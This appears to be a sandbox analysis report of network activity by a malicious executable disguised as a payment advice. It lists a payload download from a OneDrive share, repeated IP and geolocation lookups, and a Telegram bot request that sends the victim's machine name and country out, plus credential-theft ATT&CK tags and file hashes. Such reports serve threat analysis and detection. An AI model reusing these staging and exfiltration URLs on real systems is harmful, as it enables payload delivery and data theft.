Remote address:8.8.8.8:53Request197.87.175.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request171.39.242.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestmail.foodex.com.pkIN AResponsemail.foodex.com.pkIN CNAMEfoodex.com.pkfoodex.com.pkIN A37.27.123.72
-
Remote address:8.8.8.8:53Request92.12.20.2.in-addr.arpaIN PTRResponse92.12.20.2.in-addr.arpaIN PTRa2-20-12-92deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request72.123.27.37.in-addr.arpaIN PTRResponse72.123.27.37.in-addr.arpaIN PTRserver43 hndserversnet
-
Remote address:8.8.8.8:53Request88.210.23.2.in-addr.arpaIN PTRResponse88.210.23.2.in-addr.arpaIN PTRa2-23-210-88deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request83.210.23.2.in-addr.arpaIN PTRResponse83.210.23.2.in-addr.arpaIN PTRa2-23-210-83deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request11.227.111.52.in-addr.arpaIN PTRResponse
-
13.107.42.12:443https://api.onedrive.com/v1.0/shares/s!Ak1b_TF9hoG0fK5urEn6TsYKM_Y/root/contenttls, httpPayeeAdvice_HK54912_R0038704_37504.exe1.2kB 10.9kB 14 14
HTTP Request
GET https://api.onedrive.com/v1.0/shares/s!Ak1b_TF9hoG0fK5urEn6TsYKM_Y/root/contentHTTP Response
302 -
13.107.42.12:443https://fa3hwa.dm.files.1drv.com/y4mEprthCF5mq6ohjyODH5IqEX9-zxOXMFMn1SBjkig9TMJ0iW6hgdn3JyiMZPOzrO4b7j6aZi_6ijPwhelKeUnPxDOGjlqm8sCQ6PsJqBTReZUlLMc7dAcR7XlNz2TvpwYv2DEMCQktobmlzTemLYAZHbCHN5XyR1CyXP4MLrlsiLaHWYTUMx7UdGkSNmTxrk-jRRJigmuo_I0CVq8QFAgzw/kuqVmvhlro64.bintls, httpPayeeAdvice_HK54912_R0038704_37504.exe11.1kB 297.8kB 223 223
HTTP Request
GET https://fa3hwa.dm.files.1drv.com/y4mEprthCF5mq6ohjyODH5IqEX9-zxOXMFMn1SBjkig9TMJ0iW6hgdn3JyiMZPOzrO4b7j6aZi_6ijPwhelKeUnPxDOGjlqm8sCQ6PsJqBTReZUlLMc7dAcR7XlNz2TvpwYv2DEMCQktobmlzTemLYAZHbCHN5XyR1CyXP4MLrlsiLaHWYTUMx7UdGkSNmTxrk-jRRJigmuo_I0CVq8QFAgzw/kuqVmvhlro64.binHTTP Response
200 -
2.3kB 3.8kB 23 14
HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200 -
172.67.177.134:443https://reallyfreegeoip.org/xml/181.215.176.83tls, httpPayeeAdvice_HK54912_R0038704_37504.exe2.2kB 14.9kB 25 16
HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200 -
149.154.167.220:443https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:KBKWGEBK%0D%0ADate%20and%20Time:%2011/16/2024%20/%203:49:33%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20KBKWGEBK%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dtls, httpPayeeAdvice_HK54912_R0038704_37504.exe1.2kB 6.7kB 11 11
HTTP Request
GET https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:KBKWGEBK%0D%0ADate%20and%20Time:%2011/16/2024%20/%203:49:33%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20KBKWGEBK%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5DHTTP Response
404 -
2.0kB 1.3kB 16 17
-
72 B 158 B 1 1
DNS Request
28.118.140.52.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
140.32.126.40.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
196.249.167.52.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
97.17.167.52.in-addr.arpa
-
62 B 284 B 1 1
DNS Request
api.onedrive.com
DNS Response
13.107.42.12
-
70 B 279 B 1 1
DNS Request
fa3hwa.dm.files.1drv.com
DNS Response
13.107.42.12
-
71 B 92 B 1 1
DNS Request
12.42.107.13.in-addr.arpa
-
64 B 176 B 1 1
DNS Request
checkip.dyndns.org
DNS Response
132.226.247.73193.122.6.168193.122.130.0158.101.44.242132.226.8.169
-
65 B 97 B 1 1
DNS Request
reallyfreegeoip.org
DNS Response
172.67.177.134104.21.67.152
-
73 B 158 B 1 1
DNS Request
73.247.226.132.in-addr.arpa
-
73 B 135 B 1 1
DNS Request
134.177.67.172.in-addr.arpa
-
62 B 78 B 1 1
DNS Request
api.telegram.org
DNS Response
149.154.167.220
-
74 B 167 B 1 1
DNS Request
220.167.154.149.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
197.87.175.4.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
171.39.242.20.in-addr.arpa
-
64 B 94 B 1 1
DNS Request
mail.foodex.com.pk
DNS Response
37.27.123.72
-
69 B 131 B 1 1
DNS Request
92.12.20.2.in-addr.arpa
-
71 B 108 B 1 1
DNS Request
72.123.27.37.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
88.210.23.2.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
83.210.23.2.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
11.227.111.52.in-addr.arpa
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11KB
MD5fc90dfb694d0e17b013d6f818bce41b0
SHA13243969886d640af3bfa442728b9f0dff9d5f5b0
SHA2567fe77ca13121a113c59630a3dba0c8aaa6372e8082393274da8f8608c4ce4528
SHA512324f13aa7a33c6408e2a57c3484d1691ecee7c3c1366de2bb8978c8dc66b18425d8cab5a32d1702c13c43703e36148a022263de7166afdce141da2b01169f1c6